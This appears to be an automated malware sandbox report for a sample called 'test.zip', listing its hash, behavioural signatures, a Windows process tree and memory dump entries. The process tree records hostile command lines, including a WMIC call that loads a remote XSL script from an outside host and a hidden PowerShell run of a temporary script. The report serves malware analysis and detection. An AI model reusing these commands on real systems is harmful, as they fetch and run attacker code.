Resubmissions

13-11-2019 07:33

191113-s6xvalyd5a 0

12-11-2019 15:34

191112-9te2mt6rbs 0

04-11-2019 16:22

191104-pvpshym7va 0

Analysis

  • max time kernel
    145s
  • max time network
    150s
  • resource
    win10v191014

General

  • Target

    test.zip

  • Sample

    191113-s6xvalyd5a

  • SHA256

    72b228f51cf5a1b7600f0e0848145e4e54e54838977a5a5b1c85f69b64b92cf5

Score
N/A

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Loads dropped DLL 3 IoCs
  • Uses Volume Shadow Copy WMI provider 3 IoCs
  • Discovering connected drives 3 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Uses Volume Shadow Copy Service COM API 3 IoCs
  • Drops startup file 1 IoCs
  • Drops file in system dir 40 IoCs
  • Uses Task Scheduler COM API 1 TTPs 19 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of AdjustPrivilegeToken
    • Discovering connected drives
    PID:4968
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in system dir
    PID:5048
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
    1⤵
      PID:5056
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
      1⤵
        PID:5116
      • C:\Windows\System32\MsiExec.exe
        C:\Windows\System32\MsiExec.exe -Embedding F6DCE9C4CAD94F49E07D376778777BF2
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2016
      • C:\Windows\system32\SppExtComObj.exe
        C:\Windows\system32\SppExtComObj.exe -Embedding
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:3164
      • C:\Windows\System32\SLUI.exe
        "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
        1⤵
          PID:3680
        • C:\Windows\System32\Wbem\WMIC.exe
          "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
          1⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious use of AdjustPrivilegeToken
          PID:4656
        • C:\Windows\syswow64\MsiExec.exe
          C:\Windows\syswow64\MsiExec.exe -Embedding 5EC4B6F756F08EB7BF50059B493CC3A2
          1⤵
          • Suspicious use of WriteProcessMemory
          • Loads dropped DLL
          PID:4668
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
          1⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Uses Volume Shadow Copy WMI provider
          • Uses Volume Shadow Copy Service COM API
          • Drops startup file
          • Uses Task Scheduler COM API
          PID:4700
        • C:\Users\Admin\AppData\Local\Temp\lcADA5.tmp
          "C:\Users\Admin\AppData\Local\Temp\lcADA5.tmp"
          1⤵
          • Executes dropped EXE
          PID:4276
        • C:\Users\Admin\AppData\Roaming\WFKhm\nvsmartmaxapp.exe
          "C:\Users\Admin\AppData\Roaming\WFKhm\nvsmartmaxapp.exe"
          1⤵
          • Suspicious use of WriteProcessMemory
          • Loads dropped DLL
          • Executes dropped EXE
          PID:4836
        • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
          "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
          1⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Loads dropped DLL
          PID:4900
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s BITS
          1⤵
          • Drops file in system dir
          PID:4724
        • \??\c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
          1⤵
            PID:4372
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
            1⤵
            • Checks system information in the registry (likely anti-VM)
            PID:3820
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k unistacksvcgroup
            1⤵
              PID:548
            • \??\c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
              1⤵
              • Windows security modification
              PID:4160

            Network

            MITRE ATT&CK Enterprise v15

            MITRE ATT&CK Additional techniques

            • T1089

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/4900-25-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-33-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-22-0x0000000006380000-0x0000000006381000-memory.dmp

              Filesize

              4KB

            • memory/4900-23-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-24-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-36-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-26-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-27-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-28-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-29-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-30-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-31-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-32-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-20-0x0000000005B80000-0x0000000005B81000-memory.dmp

              Filesize

              4KB

            • memory/4900-34-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4900-35-0x0000000000A50000-0x0000000000A60000-memory.dmp

              Filesize

              64KB

            • memory/4968-0-0x00000202D07A0000-0x00000202D07A4000-memory.dmp

              Filesize

              16KB